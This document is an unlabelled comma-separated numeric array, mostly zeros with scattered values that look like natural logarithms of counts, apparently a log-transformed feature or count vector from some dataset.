0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 6.182084906716631, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 1.791759469228055, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.550898738446989, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 5.365976015021851, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.1298987149230735, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.772588722239781, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.295836866004329, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 2.0794415416798357, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 1.9459101490553132, 3.0841946160253877, 0, 0.0, 0, 0.0, 0.0, 0.0, 5.3230099791384085, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.4825185607408002, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 3.4825185607408002, 0, 0.0, 0.0, 5.2237778411112, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 4.553876891600541, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 9.368314490550079, 5.2237778411112, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 2.772588722239781, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 4.160336650881089, 0.0, 0.0, 2.6390573296152584, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 4.859812404361672, 0.0, 0.0, 0.0, 5.493061443340549, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.295836866004329, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 3.4339872044851467, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 2.8398715690385097, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.581130849408909, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 1.0986122886681098, 0, 0.0, 2.8398715690385097, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.833213344056216, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.93848385770662, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 2.9444389791664403, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 3.6109179126442243, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 1.6094379124341003, 0.0, 1.791759469228055, 4.06534854782536, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 4.06534854782536, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 5.480638923341991, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 2.8398715690385097, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 3.713572066704308, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.8903717578961645, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 3.9318256327243257, 0, 0.0, 0.0, 0.0, 0.0, 3.4825185607408002, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.2574953720277815, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 2.3978952727983707, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.7369991058576035, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.5263605246161616, 0.0, 0.0, 2.9957322735539913, 0, 0.0, 0.0, 0, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 9.656627474604601, 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 